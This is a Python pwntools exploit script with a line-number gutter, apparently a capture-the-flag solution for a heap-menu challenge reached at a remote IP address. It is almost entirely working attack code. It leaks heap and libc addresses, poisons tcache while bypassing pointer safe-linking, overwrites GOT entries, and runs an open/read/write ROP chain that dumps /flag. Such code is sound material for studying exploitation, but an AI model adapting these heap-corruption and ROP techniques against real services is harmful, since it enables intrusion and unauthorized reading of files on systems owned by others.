1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136
|
from pwn import *
io = remote('34.124.157.94', 12346) context.binary = 'chall' elf = ELF('chall', checksec = False) libc = ELF('./lib/libc.so.6', checksec = False)
ru = lambda x : io.recvuntil(x, drop = True) sa = lambda a, b : io.sendafter(a, b) sla = lambda a, b : io.sendlineafter(a, b) ia = lambda : io.interactive() uu64 = lambda x : u64(x.ljust(8, '\x00')) libc_os = lambda x : libc_base + x libc_sym = lambda x : libc_os(libc.sym[x])
def menu(choice): sla('Option: ', str(choice))
def add(idx, content): menu(1) sla('Index: ', str(idx)) sa('Write me a book no more than 32 characters long!\n', content)
def edit(idx, content): menu(2) sla('Index: ', str(idx)) sa('Write me the new contents of your book that is no longer than what it was before.\n', content)
def delete(idx): menu(3) sla('Index: ', str(idx))
def gift(idx): menu(1337) sla('What is your favourite number? ', str(idx))
sla('> ', 'a' * 5 + flat(0x41)[:-1]) add(1, 'a') gift(1) ru('You found a secret message: ') heap_base = int(ru('\n'), 16) - (0x1837d10 - 0x1834000) key = heap_base >> 12 add(2, 'a') add(3, 'a') add(4, 'a' * 0x20) edit(1, 'a' * 0x10) delete(2) add(2, 'a' * 0x20) key += 3 pld = flat({ 0x18: 0x41, 0x20: key ^ 0x00000000004040C0, 0x28: 'a' * 8 }, filler = '\x00') edit(2, pld) delete(4) delete(3) edit(2, pld) add(3, 'a' * 0x20) pld = flat({ 0x20: 0x300, 0x28: 0x0000000000404018 }, filler = '\x00') add(4, 'a' * 0x20) edit(4, pld) edit(1, flat(0x0000000000401150)) pld = flat({ 0x20: 0x300, 0x28: 0x404030 }, filler = '\x00') edit(4, pld) delete(1) libc_base = uu64(ru('\n')) - (0x7fa8b29bced0 - 0x7fa8b293c000) open_addr = libc_sym('open') write_addr = libc_sym('write') read_addr = libc_sym('read') pop_rdi = libc_os(0x000000000002a3e5) pop_rsi = libc_os(0x000000000002be51) pop_rdx_r12 = libc_os(0x000000000011f497) pop_rax = libc_os(0x0000000000045eb0) syscall = 0x000000000040130a rop_chain = flat([ pop_rax, 2, pop_rdi, 0x00000000004040A0 + 0x400, pop_rsi, 0, syscall, 0, pop_rdi, 3, pop_rsi, 0x00000000004040A0 + 0x500, pop_rdx_r12, 0x30, 0, read_addr, pop_rdi, 1, write_addr ]) rop_chain = rop_chain.ljust(0x100, '\x00') rop_chain += '/flag\x00' pld = flat({ 0x20: 0x300, 0x28: 0x00000000004040A0 + 0x300 }, filler = '\x00') edit(4, pld) edit(1, rop_chain) gadget = libc_os(0x7fbb822dd1fa - 0x7fbb82173000) pld = flat({ 0x20: 0x300, 0x28: 0x0000000000404018 }, filler = '\x00') edit(4, pld) edit(1, flat(gadget))
pld = flat({ 0x20: 0x300, 0x28: 0x00000000004040A0 + 0x200 }, filler = '\x00') edit(4, pld) pld = flat({ 0: 0x00000000004040A0 + 0x2f8, 8: 0x00000000004014bc, 0x18: 0x00000000004040A0 + 0x200, 0x28: 0x00000000004014bc, 0x48: 0x00000000004040A0 + 0x200, }) edit(1, pld) delete(1)
ia()
|